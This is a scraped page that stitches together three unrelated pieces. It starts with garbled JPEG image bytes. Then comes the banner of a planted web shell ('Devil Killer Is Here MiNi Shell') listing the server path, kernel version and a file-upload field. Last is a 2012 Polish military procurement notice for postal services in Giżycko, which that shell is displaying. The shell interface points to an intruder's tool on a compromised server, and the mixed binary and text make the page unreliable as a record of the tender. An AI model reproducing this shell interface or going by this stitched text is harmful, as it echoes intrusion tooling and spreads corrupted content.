JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121206/493704-N-2012.html

<p class="kh_header"><b>Giżycko: post. nr 160/2012 POWSZECHNE USŁUGI POCZTOWE W OBROCIE KRAJOWYM.</b><br>
<b>Numer ogłoszenia: 493704 - 2012; data zamieszczenia: 06.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 4352 , ul. Nowowiejska 20, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 87 429 46 02, faks 87 429 46 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.24wog.wp.mil.pl.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> post. nr 160/2012 POWSZECHNE USŁUGI POCZTOWE W OBROCIE KRAJOWYM..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie powszechnych usług pocztowych w rozumieniu art. 3 pkt 25 ustawy 12 czerwca 2003 r. Prawo pocztowe (tj. z 2008 r. Dz. U. Nr 189, poz. 1159 z późn. zm.) w obrocie krajowym w zakresie przyjmowania, przemieszczania i doręczania przesyłek listowych i paczek zgodnie z ustawą Prawo pocztowe oraz zwrotu przesyłek niedoręczonych na rzecz Jednostki Wojskowej 4352 w Giżycku i jednostek będących na jej zaopatrzeniu:
W m. Giżycko:
1)	Jednostka Wojskowa nr 3797 przy Al. Wojska Polskiego 21;
2)	Wojskowa Komenda Uzupełnień (WKU) przy ul. Moniuszki 7;
3)	Jednostka Wojskowa nr 4352 przy ul. Nowowiejskiej 20
4)	Placówka Żandarmerii Wojskowej (PWŻ) przy ul. Moniuszki 3
W m. Węgorzewo - Jednostka Wojskowa nr 2568 przy ul. Bema 7;
W m. Suwałki: 
1)	Wojskowa Komenda Uzupełnień (WKU) przy ul. Puławskiego 21;
2)	Jednostka Wojskowa nr 1747 przy ul. Wojska Polskiego 21;
3)	Jednostka Wojskowa nr 2031 Szypliszki w m. Szelment 3;
W m. Gołdap - Jednostka Wojskowa nr 4808 przy ul. Partyzantów 33;
W m. Kruklanki - Jednostka Wojskowa nr 2031.
4.	Wykonawca zobowiązany jest do doręczania i odbioru przesyłek przygotowanych do wyekspediowania oraz zwrotów:
Lp.	Nazwa jednostki organizacyjnej NADAWCY	Adres (miejscowość, ulica) 	Telefon kontaktowy Dni odbioru przesyłek	Godziny odbioru przesyłek
1	JW 3797 Giżycko	Al. Wojska Polskiego 21,  Giżycko	87 429 42 48	od poniedziałku do czwartek	8:00-15:00
				piątek 	8:00-12:00
2	WKU Giżycko	ul. Moniuszki 7, 
Giżycko	87 429 45 71	poniedziałek, środa, piątek	12:00-15:00
3	JW 4352 Giżycko	ul. Nowowiejska 20, 
Giżycko	87 429 46 07	od poniedziałku do czwartek	14:30-15:00
				piątek 	10:30-11:00
4	ŻW Giżycko	ul. Moniuszki 3, 
Giżycko	87 429 48 70	wtorek 
	14:00-15:00
				piątek	12:00-13:00
5	JW 2568 Węgorzewo	ul. Bema 7, 
Węgorzewo	87 429 37 78 	od poniedziałku do piątku	10:00-12:00
6	WKU Suwałki	ul. Puławskiego 21, 
Suwałki	87 566 95 09	od poniedziałku do piątku 	 11:00-15:00
7	JW 1747 Suwałki	ul. Wojska Polskiego 21, Suwałki	87 566 93 40	od poniedziałku do piątku	9:00-10:00
8	JW. 2031 Szypliszki	Szelment 3
Suwałki	89 674 38 02	wtorek 
piątek	12:00-14:00
9	JW 4808 Gołdap	ul. Partyzantów 33, Gołdap	87 615 62 33	od poniedziałku do piątku 	10:00-13:00 
10	JW. 2031 Kruklanki 	Kruklanki 	89 674 36 01	wtorek 
piątek	9:00-14:00
5.	Odbioru dokonywać będzie upoważniony przedstawiciel Wykonawcy po okazaniu stosownego upoważnienia.
6.	Odbiór przesyłek przygotowanych do wyekspediowania będzie każdorazowo dokumentowany przez Wykonawcę pieczęcią, podpisem i datą w pocztowej książce nadawczej (dla przesyłek rejestrowanych) oraz na zestawieniu ilościowym przesyłek wg poszczególnych kategorii wagowych (dla przesyłek ekonomicznych).
7.	Zamawiający zobowiązuje się do umieszczenia na przesyłce listowej lub paczce nazwy odbiorcy wraz z jego adresem (podany jednocześnie w pocztowej książce nadawczej),określając rodzaj przesyłki (ekonomiczna, polecona, priorytet czy ze zwrotnym poświadczeniem odbioru - ZPO) oraz umieszczania na stronie adresowej każdej nadawanej przesyłki nadruku(pieczątki) określającej pełną nazwę i adres Zamawiającego.
8.	Zamawiający zobowiązuje się do właściwego przygotowania przesyłek oraz sporządzania zestawień dla przesyłek.
9.	Zamawiający zobowiązuje się do nadawania przesyłek w stanie uporządkowanym, przez co należy rozumieć:
1)	dla przesyłek rejestrowanych - wpisanie każdej przesyłki do pocztowej książki nadawczej w dwóch egzemplarzach, z których oryginał będzie przeznaczony dla Wykonawcy w celach rozliczeniowych, a kopia stanowić będzie dla Zamawiającego potwierdzenie nadania danej partii przesyłek,
2)	dla przesyłek ekonomicznej - zestawienie ilościowe przesyłek wg poszczególnych kategorii wagowych sporządzone dla celów rozliczeniowych w dwóch egzemplarzach, z których oryginał będzie przeznaczony dla Wykonawcy w celach rozliczeniowych, a kopia stanowić będzie dla Zamawiającego potwierdzenie nadania danej partii przesyłek.
10.	Zamawiający jest odpowiedzialny za nadawanie przesyłek listowych i paczek w stanie umożliwiającym Wykonawcy doręczenie bez ubytku i uszkodzenia do miejsca zgodnie z adresem przeznaczenia.
11.	Opakowanie przesyłek listowych stanowi koperta Zamawiającego, odpowiednio zabezpieczona (zaklejona lub zalakowana). Opakowanie paczki powinno stanowić zabezpieczenie przed dostępem do zawartości oraz aby uniemożliwiało uszkodzenie przesyłki w czasie przemieszczania.
12.	Zamawiający ma prawo zlecić usługę innemu operatorowi, a kosztami realizacji obciążyć Wykonawcę, jeżeli Wykonawca nie odbierze od Zamawiającego przesyłek w wyznaczonym dniu i czasie.
13.	Nadanie przesyłek objętych przedmiotem zamówienia następować będzie w dniu ich odbioru przez Wykonawcę od Zamawiającego.
14.	Wykonawca będzie doręczał do siedziby Zamawiającego pokwitowane przez adresata, potwierdzenie odbioru, niezwłocznie po dokonaniu doręczenia przesyłki, nie później jednak ,niż w ciągu 7 dni roboczych od dnia doręczenia.
15.	W przypadku nieobecności adresata, przedstawiciel Wykonawcy pozostawia zawiadomienie(pierwsze awizo) o próbie dostarczenia przesyłki ze wskazaniem gdzie i kiedy adresat może odebrać list lub przesyłkę. Termin do odbioru przesyłki przez adresata wynosi 14 dni roboczych liczonych od dnia następnego po dniu pozostawienia pierwszego awizo, w tym terminie przesyłka jest awizowana dwukrotnie. Po upływie terminu odbioru, przesyłka zwracana jest Zamawiającemu wraz z podaniem przyczyny nie odebrania przez adresata.
16.	Rodzaje przesyłek (usług pocztowych) jakie będą zlecane wykonawcy oraz średnie ilości danej korespondencji w skali miesiąca stanowi niżej wymieniona tabela opisu przedmiotu zamówienia.
17.	Zamawiający przyjął średnie miesięczne ilości przesyłek każdego rodzaju, w oparciu o analizę potrzeb i jako podstawę do wyliczenia ceny. Z zastrzeżeniem, że Zamawiający nie jest zobowiązany do realizowania podanych ilości przesyłek. Faktyczne ilości realizowanych przesyłek w skali miesięcznej mogą odbiegać od podanych średnich ilości.
18.	Zamawiający zastrzega sobie prawo niewykorzystania całości zamówienia.
19.	Zamawiający dopuszcza możliwość udzielenia zamówienia uzupełniającego jeżeli ilość nadanych przesyłek pocztowych przez Zamawiającego będzie większa od ilości przesyłek stanowiących podstawę do wyliczenia ceny usługi. 
20.	Przez przesyłki pocztowe, będące przedmiotem zamówienia rozumie się przesyłki listowe:
ekonomiczny - przesyłki nierejestrowane nie będące przesyłkami najszybszej kategorii w obrocie krajowym i w obrocie zagranicznym,
priorytetowe - przesyłki nierejestrowane listowe najszybszej kategorii  w obrocie krajowym i w obrocie zagranicznym,
ekonomiczny polecone - przesyłki rejestrowane nie będące przesyłkami najszybszej kategorii w obrocie krajowym i w obrocie zagranicznym,
polecone priorytetowe - przesyłki rejestrowane najszybszej kategorii w obrocie krajowym i w obrocie zagranicznym,
polecone - przesyłki rejestrowane nie będące przesyłkami najszybszej kategorii w obrocie krajowym - wysyłane za pośrednictwem polskiej placówki pocztowej operatora publicznego,
polecone priorytetowe - przesyłki rejestrowane najszybszej kategorii w obrocie krajowym - wysyłane za pośrednictwem polskiej placówki pocztowej operatora publicznego,
polecone za zwrotnym potwierdzeniem odbioru (ZPO) - przesyłki nie będące przesyłkami najszybszej kategorii przyjęte za potwierdzeniem nadania i doręczone za pokwitowaniem odbioru w obrocie krajowym,
polecone priorytetowe za zwrotnym potwierdzeniem odbioru (ZPO) przesyłki najszybszej kategorii przyjęte za potwierdzeniem nadania i doręczone za pokwitowaniem odbioru w obrocie krajowym,
polecone za zwrotnym potwierdzeniem odbioru (ZPO) - przesyłki nie będące przesyłkami najszybszej kategorii przyjęte za potwierdzeniem nadania i doręczone za pokwitowaniem odbioru w obrocie krajowym - wysyłane za pośrednictwem polskiej placówki pocztowej operatora publicznego,
polecone priorytetowe za zwrotnym potwierdzeniem odbioru (ZPO) przesyłki najszybszej kategorii przyjęte za potwierdzeniem nadania i doręczone za pokwitowaniem odbioru w obrocie krajowym - wysyłane za pośrednictwem polskiej placówki pocztowej operatora publicznego.
Gabaryt A- to przesyłka o wymiarach:
Minimum - wymiary strony adresowej nie mogą być mniejsze niż 90 x140 mm,
Maksimum - żaden z wymiarów nie może przekroczyć wysokości 20 mm, szerokości 230mm.
Gabaryt B - to przesyłka o wymiarach:
Minimum - jeśli choć jeden z wymiarów przekracza wysokość 20 mm lub długość 325 mm lub szerokość 230 mm,
Maksimum - suma długości, szerokości i wysokości nie może być większa niż 900 mm, przy czym największy z tych wymiarów (długość) nie może przekroczyć 600 mm.
21.	 Przez paczki pocztowe, rozumie się paczki:
ekonomiczny - rejestrowane nie będące paczkami najszybszej kategorii
priorytetowe - rejestrowane najszybszej kategorii
Gabaryt A - to przesyłka o wymiarach:
Minimum - wymiary strony adresowej nie mogą być mniejsze niż 90 x 140 mm,
Maksimum - żaden z wymiarów nie może przekroczyć długości 600 mm, szerokość 500 mm, wysokość 300 mm.
Gabaryt B - to przesyłka o wymiarach:
Minimum - jeśli choć jeden z wymiarów przekracza długość 600 mm lub szerokość 500mm lub wysokość 300 mm,
Maksimum - suma długości i największego obwodu mierzonego w innym kierunku niż długość nie może być większa niż 3000 mm, przy czym największy wymiar nie może przekroczyć 1500 mm.
22.	Podstawę prawną działania Zamawiającego w zakresie przedmiotowego postępowania stanowią: 
1)	Ustawa z dnia 12 czerwca 2003 r. Prawo pocztowe (Dz.U. 2003 Nr 130 poz. 1188,       z późn. zm.).
2)	Rozporządzenie Ministra Infrastruktury z dnia 9 stycznia 2004 r. w sprawie warunków wykonywania powszechnych usług pocztowych (Dz. U. z 2004r. Nr 5, poz. 34 z późn. zm.).
3)	Rozporządzenie Ministra Infrastruktury z dnia 13 października 2003r w sprawie reklamacji powszechnej usługi pocztowej w zakresie przesyłki rejestrowanej i przekazu pocztowego (Dz. U. z 2003r. Nr 183, poz. 1795 z późn. zm.).
23.	Wymagania dotyczące Wykonawcy:
1)	Wykonawcy posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, tj. Wykonawca posiada zezwolenie Prezesa Urzędu Komunikacji Elektronicznej  na wykonywanie działalności pocztowej w zakresie przyjmowania, przemieszczania i doręczania przesyłek w obrocie krajowym i zagranicznym zgodnie z art. 6 ust. 1 Ustawy Prawo pocztowe z dnia 12 czerwca 2003 r. Prawo pocztowe (Dz.U. 2003 Nr 130 poz. 1188, z późn. zm.).
2)	W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy, wykonawca składa następujące dokumenty :
kserokopie zezwolenia Prezesa Urzędu Komunikacji Elektronicznej na wykonywanie działalności pocztowej w zakresie przyjmowania, przemieszczania i doręczania przesyłek w obrocie krajowym zgodnie z art. 6 ust. 1 Ustawy Prawo pocztowe z dnia 12 czerwca 2003 r. Prawo pocztowe (Dz.U. 2003 Nr 130 poz. 1188, z późn. zm.).
Polskiej Normy PN-T-85004 - koperty i kartki pocztowe,
Polskiej Normy PN-T-85003 - koperty listowe do automatycznego pracowania,
Polskiej Normy PN-IS0269 - koperty listowe i kartki pocztowe,
Aktów wewnętrznych wydanych przez Wykonawcę na podstawie art. 24 ustawy Prawo Pocztowe,

24.	Rodzaje przesyłek (usług pocztowych) oraz szacunkowa ilość w okresie obowiązywania umowy.  
Lp.	Rodzaj przesyłki/usługi	Waga/JW	Ilość w szt./m-c
1. 
 
 
 	
Przesyłki nierejestrowane
nie będące przesyłkami
najszybszej kategorii w
obrocie krajowym
(ekonomiczne)	Do 50 g. Gabaryt A
 
 
 	7600
2.
 
 
 	Przesyłki nierejestrowane
najszybszej kategorii w
obrocie krajowym
(priorytetowe)	 
Do 50 g. Gabaryt A
 
 	730
3.
 
 
 
 
 	Przesyłki rejestrowane
nie będące przesyłkami
najszybszej kategorii w
obrocie krajowym
(ekonomiczne polecone)
 	 
Do 50 g. Gabaryt A
 
 
 
 	7990
4.
 
 
 	Przesyłki rejestrowane
najszybszej kategorii w
obrocie krajowym
(priorytetowe polecone)	Do 50 g. Gabaryt A
 
	775
5.	Przesyłki polecone ZPO

	Do 50 g. Gabaryt A	2470
6.	Przesyłki polecone priorytet ZPO

	Do 50 g. Gabaryt A	520
7.	Przesyłki nierejestrowane
nie będące przesyłkami
najszybszej kategorii w
obrocie krajowym
(ekonomiczne)	ponad 50 g. do 100 g. gabaryt A
	940
		ponad 100 g. do 350 g. gabaryt A
	870
		ponad 100 g. do 350 g. gabaryt B
	290
		ponad 350 g. do 500 g. gabaryt A
	330
		ponad 350 g. do 500 g. gabaryt B
	160
	 	ponad 500 g. do 1000 g. gabaryt A
	160
	 	ponad 500 g. do 1000 g. gabaryt B
	110
	 


	ponad 1000 g. do 2000 g. gabaryt A
	262
	 

	ponad 1000 g. do 2000 g. gabaryt B
	200
8.	Przesyłki nie rejestrowane
najszybszej kategorii w
obrocie krajowym
(priorytetowe)	ponad 50 g. do 100 g. gabaryt A
	485
		ponad 50 g. do 100 g. gabaryt B
	340
		ponad 100 g. do 350 g. gabaryt A
	170
		ponad 100 g. do 350 g. gabaryt B
	135
		ponad 350 g. do 500 g. gabaryt A
	160
		ponad 350 g. do 500 g. gabaryt B
	130
		ponad 500 g. do 1000 g. gabaryt A
	100
		ponad 500 g. do 1000 g. gabaryt B
	100
		ponad 1000 g. do 2000 g. gabaryt A
	110
	 	ponad 1000 g. do 2000 g. gabaryt B
	70
9.	Przesyłki rejestrowane
nie będące przesyłkami
najszybszej kategorii w
obrocie krajowym
(ekonomiczne polecone)	ponad 50 g. do 100 g. gabaryt A	3260
		ponad 50 g. do 100 g. gabaryt B	430
		ponad 100 g. do 350 g. gabaryt A	1560
		ponad 100 g. do 350 g. gabaryt B	315
		ponad 350 g. do 500 g. gabaryt A	550
		ponad 350 g. do 500 g. gabaryt B	170
		ponad 500 g. do 1000 g. gabaryt A	490
		ponad 500 g. do 1000 g. gabaryt B	135
		ponad 1000 g. do 2000 g. gabaryt A	480
	 	ponad 1000 g. do 2000 g. gabaryt B	150
10.	Przesyłki rejestrowane
najszybszej kategorii w
obrocie krajowym
(priorytetowe polecone)	ponad 50 g. do 100 g. gabaryt A	610
		ponad 50 g. do 100 g. gabaryt B	240
		ponad 100 g. do 350 g. gabaryt A	510
		ponad 100 g. do 350 g. gabaryt B	120
		ponad 350 g. do 500 g. gabaryt A	250
		ponad 350 g. do 500 g. gabaryt B	60
		ponad 500 g. do 1000 g. gabaryt A	220
		ponad 500 g. do 1000 g. gabaryt B	140
	 	ponad 1000 g. do 2000 g. gabaryt B	160
11.	Paczki rejestrowane nie
będące paczkami najszybszej
kategorii w obrocie krajowym
(ekonomiczne)	od 2 kg do 5 kg gabaryt A	77
		od 5 kg do 10 kg gabaryt A	40
		od 10 kg do 15 kg gabaryt A	20
12.	Paczki rejestrowane
najszybszej kategorii
w obrocie krajowym
(priorytetowe)	od 2 kg do 5 kg gabaryt A	15
		od 5 kg do 10 kg gabaryt A	10
13	Odbioru przesyłek	JW 3797 Giżycko	12 m-c
		WKU Giżycko	12 m-c
		JW 4352 Giżycko	12 m-c
		ŻW Giżycko	12 m-c
		JW 2568 Węgorzewo	12 m-c
		WKU Suwałki	12 m-c
		JW 1747 Suwałki	12 m-c
		JW. 2031 Szypliszki	12 m-c
		JW 4808 Gołdap	12 m-c
		JW. 2031 Kruklanki	12 m-c.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z treści złożonych do oferty oświadczeń i dokumentów musi wynikać jednoznacznie, że n/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, o którym mowa w art. 44 ustawy p.z.p - (Załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, o którym mowa w art. 44 ustawy p.z.p - (Załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, o którym mowa w art. 44 ustawy p.z.p - (Załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, o którym mowa w art. 44 ustawy p.z.p - (Załącznik nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.FORMULARZ OFERTOWY ­ wypełniony i podpisany wg wzoru Zamawiającego (Załącznik nr 1 do SIWZ ).
